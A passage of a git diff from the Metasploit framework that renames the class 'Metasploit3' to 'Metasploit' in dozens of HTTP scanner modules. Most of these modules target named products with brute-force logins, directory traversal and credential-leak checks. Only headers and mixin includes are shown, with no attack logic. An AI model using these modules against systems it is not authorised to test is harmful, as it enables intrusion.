b/modules/auxiliary/scanner/http/jenkins_login.rb index 66bd139aa9..0ec24a6ad9 100644 --- a/modules/auxiliary/scanner/http/jenkins_login.rb +++ b/modules/auxiliary/scanner/http/jenkins_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/jenkins' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb index 0b355c0e4f..660ea8a482 100644 --- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb +++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index 66072a6adb..5281c98d42 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index dee21277e9..3579874eb2 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 3e280c8ad8..3e3f59853e 100644 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Joomla include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb index 668cfc4337..af02b848e7 100644 --- a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb +++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index 4b232b66dc..66f7697bd4 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index bae0916994..b32f14a907 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 8e65e4407c..4fa73fb05a 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 87668dd476..73bda69bce 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb index 69fe63fff8..d8a90b51f6 100644 --- a/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb +++ b/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/manageengine_desktop_central' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index 2204a9ecda..60bc2d9032 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 3d6acc979a..1f027d4c9a 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 77d6dc7091..c6931cdcd4 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 0c403db076..6756ff3ede 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8fc76e5fe0..3888f73937 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8f60998e85..b2a9114ece 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index 8a5734b6b9..09bb4e0eba 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mybook_live_login.rb b/modules/auxiliary/scanner/http/mybook_live_login.rb index caeca141c7..1003f451ea 100644 --- a/modules/auxiliary/scanner/http/mybook_live_login.rb +++ b/modules/auxiliary/scanner/http/mybook_live_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mybook_live' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netdecision_traversal.rb b/modules/auxiliary/scanner/http/netdecision_traversal.rb index 0d6064563a..eafbdfcd0f 100644 --- a/modules/auxiliary/scanner/http/netdecision_traversal.rb +++ b/modules/auxiliary/scanner/http/netdecision_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 5f7bb5fc2b..a328536b50 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index b49e3e4137..aed2e261ce 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 3c03a14c2d..62c8a6ba56 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 6bcc2dcb1e..3aca25533a 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 123e89d6df..24bb2b48d2 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index 3402e97dd7..02cf8f0737 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 1839e47ddd..e690f93256 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index 4d69c421a2..f959077b1b 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index f536b5a39a..ec0e5905d9 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index 2f1167132c..fe6d37b75a 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb index 542b5ef896..7f42e101bf 100644 --- a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index b2393bbd3b..7beb2986ad 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index f1107f89a4..c2524f96b5 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index fea9b90324..e55b96cefa 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index abcb16ce3f..5ff8ef25df 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index cb12852868..46ec92c891 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 5bdbe7bed5..fecc5f3613 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 3e6f52150b..ed182ca85f 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 3537b86519..70aebda581 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -9,7 +9,7 @@ require 'pathname' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index cb103e7da7..f41e13f714 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2b42cb8c54..9aca918117 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 4d9933953b..ea743fe30f 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 49fa51058f..b369a1bc57 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index f83d2b5033..701edc6bbb 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index aef82de583..bdcae03031 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index f56d659877..aa193ba135 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index 8e33ae7cea..60fe402ea0 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 817d830d11..279ceaa5a4 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 7567b73111..9ede831383 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index 64f8ba1137..af7c588853 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index 9e8a38d6c5..defb2c5451 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 19c37446a5..37eb87f217 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index c7f90ebff3..82d83b8e7f 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 26cd5777e9..b3014a210f 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index e145de83eb..c3f7d4a499 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index b7a87ad514..41efd17717 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index adc6eb3a10..876f827950 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index b9deea0f9c..bcd814b07c 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 35833d09af..2b630f3631 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 77969a4f9e..6e5883402a 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket/range_walker' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git 